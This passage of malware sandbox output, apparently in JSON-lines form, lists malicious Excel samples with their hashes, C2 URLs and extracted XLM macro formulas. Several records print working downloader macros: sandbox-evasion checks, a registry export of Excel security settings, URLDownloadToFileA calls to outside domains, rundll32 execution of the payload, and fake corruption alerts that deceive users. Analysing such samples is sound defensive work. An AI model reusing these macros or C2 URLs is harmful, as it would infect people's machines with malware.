Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"XxRgq8xpBU\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41ce0798b1591f998f93d50015ae1fbb947dee55a63c7a6e79690c6f9d7cb271"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41ce0798b1591f998f93d50015ae1fbb947dee55a63c7a6e79690c6f9d7cb271","filesize":144384,"md5":"adae819d32e12bff0dc98e3580787070","sha1":"8523254bab03aa0f4a393a257edb4a6f29e8931c","sha256":"41ce0798b1591f998f93d50015ae1fbb947dee55a63c7a6e79690c6f9d7cb271","sha512":"01926b4598b6dc8c50a48c2baa5566cb7e74492948979541ef9394d174509d0413a9e4b31f513de5a7c547e66e6782f1055b2b042f14894300485384f3c4fd37","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41ce0798b1591f998f93d50015ae1fbb947dee55a63c7a6e79690c6f9d7cb271.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"VjRc6xJ4JV\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41e44cd8e59a58cd312e63af1887ef0b7a43acd615958febeb62cb7e4b5683d8"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41e44cd8e59a58cd312e63af1887ef0b7a43acd615958febeb62cb7e4b5683d8","filesize":112128,"md5":"3c7432f17e90511fd166eeefffa72a7f","sha1":"3f3872bfa33d1d04f289472ca5d4ad1c32a232e3","sha256":"41e44cd8e59a58cd312e63af1887ef0b7a43acd615958febeb62cb7e4b5683d8","sha512":"9dbc03adf3d8ec65f9b861a42e78eb86873f06eebb391962a40554cbdb3d3a9b5a8d21e512fbc00622c00f20fb465e9df3d63ee2f8306934a83bef25cfc3c3b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41e44cd8e59a58cd312e63af1887ef0b7a43acd615958febeb62cb7e4b5683d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41f04d26d582f35770a37e65752f5c34d554fb30ed57ea26b756fc12f784040c"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41f04d26d582f35770a37e65752f5c34d554fb30ed57ea26b756fc12f784040c","filesize":209920,"md5":"8fb9a6ce2adbc65635f4b34fce894877","sha1":"bcf151d2ae626c080cdf986691be06eb91861997","sha256":"41f04d26d582f35770a37e65752f5c34d554fb30ed57ea26b756fc12f784040c","sha512":"8e9168e966fc6024fe8c3731d16529dea6b25c2579ab782d4d0a3e88177c38bfa234caa3793700ba99a5af2a26dbeb1a6e08541ab604656dd91c0281147a2804","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41f04d26d582f35770a37e65752f5c34d554fb30ed57ea26b756fc12f784040c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7hLrnknMKu\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41f6c2e096fc1625861946ee8ba2a0a286864b55c09f516cda80e068333f47ba"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41f6c2e096fc1625861946ee8ba2a0a286864b55c09f516cda80e068333f47ba","filesize":152576,"md5":"4e6ed3c2bb403eaba853285fc01f0b5e","sha1":"d7209318118b78d28db72af85eec79e8089bba0d","sha256":"41f6c2e096fc1625861946ee8ba2a0a286864b55c09f516cda80e068333f47ba","sha512":"35d6cfcc982d4f3e86a4ad5eccc2c527677036b543e88c3a61119c667808813e292c24d84b2d5d1948268c851d3e09c92ee92ea5ebb114565edabbd05388e4b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41f6c2e096fc1625861946ee8ba2a0a286864b55c09f516cda80e068333f47ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zY3rcpUZsZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"41f7642a9842c59f0e1be04df880c9156323e168ef932386b2941b40cc51b3c3"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"41f7642a9842c59f0e1be04df880c9156323e168ef932386b2941b40cc51b3c3","filesize":168960,"md5":"2af7753f78235fd2d935067efe6c0d64","sha1":"2dd510be8bf9536fd5734697fc10389fe6ae51ba","sha256":"41f7642a9842c59f0e1be04df880c9156323e168ef932386b2941b40cc51b3c3","sha512":"6a3be44efb92179d1ffd4d8ce872dd4b6530319facc59c2c26a1b9ebb18131bd11a791b4a072d87eea3744a8bf134bf98f3b91fe53984a74504aaec779303ad8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"41f7642a9842c59f0e1be04df880c9156323e168ef932386b2941b40cc51b3c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7mkBAx0hY4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"422b647af0677c02f6f0511758e45b1ca10885c49e416858bc35c54734ac5f97"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"422b647af0677c02f6f0511758e45b1ca10885c49e416858bc35c54734ac5f97","filesize":206336,"md5":"3281493309b39be6ac9c251cf39add81","sha1":"db69f76579db6401d1cb1ca8cc6733f2366f1c98","sha256":"422b647af0677c02f6f0511758e45b1ca10885c49e416858bc35c54734ac5f97","sha512":"d05b1d4a041e497ffbce94b0dfd313dbac43d51ce846044b51c49297845310710b55c0941a12396b4d19492a88e6731a432776c475046e29200ee4e7b7e31dd6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"422b647af0677c02f6f0511758e45b1ca10885c49e416858bc35c54734ac5f97.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Vpy5EiLIB5\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"422dc01f7091f9ec92cf491c524f2c9b4db288d548954d69b44bd04efe4b5e51"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"422dc01f7091f9ec92cf491c524f2c9b4db288d548954d69b44bd04efe4b5e51","filesize":168960,"md5":"2cbf4dfbd54506f53fb58c9c91c7ec2d","sha1":"f72e8f17197827c4a5eb3d691d23d8f46e1e4250","sha256":"422dc01f7091f9ec92cf491c524f2c9b4db288d548954d69b44bd04efe4b5e51","sha512":"973192561b2edc77e535b3daec83b1d2427ecabb9a8eba5302adc0dbd88894b497603def7bda985baca42a98ebe3f23793ee58cc9f2994ce004ad969a3bdc8fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"422dc01f7091f9ec92cf491c524f2c9b4db288d548954d69b44bd04efe4b5e51.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PQ7kCWOvDy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"423ed1caa487de8d3ef3f9ac063c3b3ffa23660f1eb066b31e84118f45c06b52"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"423ed1caa487de8d3ef3f9ac063c3b3ffa23660f1eb066b31e84118f45c06b52","filesize":168960,"md5":"e6598c07ad063093cb90fde87cb4b84b","sha1":"0aa85f434065010ad02e6f20adfa37f6e8c2b4eb","sha256":"423ed1caa487de8d3ef3f9ac063c3b3ffa23660f1eb066b31e84118f45c06b52","sha512":"e557c1f0c2de1fe67edba6e787141bfe2b999f9c7e9edab886fa0247aa6e30e3e7fe93ff624dfbd343508bf4803e23f821e9e048615ad9ea9498b623facb2c2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"423ed1caa487de8d3ef3f9ac063c3b3ffa23660f1eb066b31e84118f45c06b52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LIjJ5Ay5nz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"423ee55d1c8fdd814b6b51dbf09800a58d3a94ec7c05aecd57a41857f3c47185"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"423ee55d1c8fdd814b6b51dbf09800a58d3a94ec7c05aecd57a41857f3c47185","filesize":167936,"md5":"d77ef027bb0279e62a4d303a0268bc8b","sha1":"da163e9e080e4e1d5cc9ac5cbffef8fa8c376b5c","sha256":"423ee55d1c8fdd814b6b51dbf09800a58d3a94ec7c05aecd57a41857f3c47185","sha512":"208a5e7b08485212d138dbeee06a97c26b1ac76d043d114baa7b486a9920b94e5be7a352cf21a9636a91785d9597a4f51f9d68751c39405c2a73e269f97c094a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"423ee55d1c8fdd814b6b51dbf09800a58d3a94ec7c05aecd57a41857f3c47185.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TO4ts0yJNw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"424428752cba74729990de5561ebaad5739a37bc3163fb673c71edde43ae299c"},"analysis":{"reported":"2020-04-09T16:15:59Z","score":10},"files":[{"filename":"424428752cba74729990de5561ebaad5739a37bc3163fb673c71edde43ae299c","filesize":167936,"md5":"5bc722c0c38e7c08a4df5f1cdceeb05e","sha1":"92f7bb471b9765178646d20f07d5a6fc39b8ac05","sha256":"424428752cba74729990de5561ebaad5739a37bc3163fb673c71edde43ae299c","sha512":"6837299286edbbafc48235c5f0d4ec0d3d9887cfa2073fd6a8d54a4683b35ffecf1211cd7f6960393f10b589499e43f1d44d49cc3225e4ea9e3f7d5258508209","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"424428752cba74729990de5561ebaad5739a37bc3163fb673c71edde43ae299c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EAEQTi13gS\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4246fc9ece456622739c706cb4d9f6ab6bc814e5e9961232f8693c1ba72f46b3"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"4246fc9ece456622739c706cb4d9f6ab6bc814e5e9961232f8693c1ba72f46b3","filesize":112640,"md5":"5a55ed731442272442016d7dfdd15bcf","sha1":"5b8e73a4f22b850f8e925b3591d5b123150b24cc","sha256":"4246fc9ece456622739c706cb4d9f6ab6bc814e5e9961232f8693c1ba72f46b3","sha512":"76c230a0a408ac6f9affba2b6a53c4c5c82f6b15b05996ca98c07b23ff597c759136f038570edf92f6fbaffe0e4cb5b2a6d1d70aa96ed0150dcf09c640c5c012","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4246fc9ece456622739c706cb4d9f6ab6bc814e5e9961232f8693c1ba72f46b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"424d3e4a72c0adf995d925fbcc1f620f70995ac83f5a47e8045813d9f8446e0c"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"424d3e4a72c0adf995d925fbcc1f620f70995ac83f5a47e8045813d9f8446e0c","filesize":113664,"md5":"48b44d70c85002dd39e2ad1d611afbb1","sha1":"078f24bc6c63678e6a699c9bd0c83cbe7ce70a46","sha256":"424d3e4a72c0adf995d925fbcc1f620f70995ac83f5a47e8045813d9f8446e0c","sha512":"9106d7135d79e86ce3e0f288aeb7b15beea170d0d5d48dbfeaa0bb5115a74291748f25af99d8a0c1393aa09ee4abb7bc895730a189359bf5619fb1084492251e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"424d3e4a72c0adf995d925fbcc1f620f70995ac83f5a47e8045813d9f8446e0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ffc97UudQj\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"42506962bb6e5d199389e9905eaec677f4adba2e906e585ce472f02a5d9932ca"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"42506962bb6e5d199389e9905eaec677f4adba2e906e585ce472f02a5d9932ca","filesize":185344,"md5":"5405ea76d07c251afe056d710d687942","sha1":"2a4dd9a83e75f5b20ac0f351b7d559676d9c4b76","sha256":"42506962bb6e5d199389e9905eaec677f4adba2e906e585ce472f02a5d9932ca","sha512":"e9cb512db8910c4b3a310b9928c5d2cdfe323c973995fbe3992e0e36f10980abf4f96c74ad82cc4a2e6af04c677fbe3491a2d7d85e57b03dcd38c3003a412084","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"42506962bb6e5d199389e9905eaec677f4adba2e906e585ce472f02a5d9932ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4252693c64b7b1732e3e00802966caab88512e65c5f6e6b7e2abc61f4547f0ce"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"4252693c64b7b1732e3e00802966caab88512e65c5f6e6b7e2abc61f4547f0ce","filesize":225280,"md5":"1722dd14b85f3eadbdfb315d7d52417d","sha1":"2fdb491998158ef99be85251aa1b22146b94ac5b","sha256":"4252693c64b7b1732e3e00802966caab88512e65c5f6e6b7e2abc61f4547f0ce","sha512":"71d779cca2a05ee159b4a4baafa4c08b746f70f5010024744ded9c60414a3fee2d058c26b0a31312228811bbda44bce3121816f7b3e01a021670a328aef70b8e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4252693c64b7b1732e3e00802966caab88512e65c5f6e6b7e2abc61f4547f0ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wJE5tRJigN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"425cedda6e4e048649eaa1398772ef21a84717e0b8ccfba8c8f233132a9f4543"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"425cedda6e4e048649eaa1398772ef21a84717e0b8ccfba8c8f233132a9f4543","filesize":167936,"md5":"181df9566ea6fb2fe52b02ba5d7e9870","sha1":"9ca4f9eb65c4407703adf553859686f702d34f04","sha256":"425cedda6e4e048649eaa1398772ef21a84717e0b8ccfba8c8f233132a9f4543","sha512":"bb72df79fcdf16ea36a6d785a758ea4e593f30c20ba3cdc3dcefebe8deaf6f5078603a9922edcf87989fdd1b7335f43311fe706095f625350200fdce37c5523d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"425cedda6e4e048649eaa1398772ef21a84717e0b8ccfba8c8f233132a9f4543.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uXcChIuWv7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"425e49742e1a36267fcf544e93ed7d392e31cb9defb645d51da5f9e4bc36aabc"},"analysis":{"reported":"2020-04-09T16:16:00Z","score":10},"files":[{"filename":"425e49742e1a36267fcf544e93ed7d392e31cb9defb645d51da5f9e4bc36aabc","filesize":207360,"md5":"ff90c8db284dda8aeb14f9c884999e85","sha1":"fd44131afd0b8d7319f75b8983b96ad487326569","sha256":"425e49742e1a36267fcf544e93ed7d392e31cb9defb645d51da5f9e4bc36aabc","sha512":"e20aa73829e3cf795884aa404f8480543300884e985f0a46087706cb5caa2f702ff1c36166b9fe192b55bd5f3812389f0613a018cd63a40248d7ec02914627b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"425e49742e1a36267fcf544e93ed7d392e31cb9defb645d51da5f9e4bc36aabc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg 